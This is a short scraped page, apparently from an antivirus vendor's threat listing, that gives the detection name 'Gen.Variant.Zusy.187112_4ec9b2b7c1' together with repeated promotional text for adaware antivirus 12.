Gen.Variant.Zusy.187112_4ec9b2b7c1

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Zusy.187112_4ec9b2b7c1

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet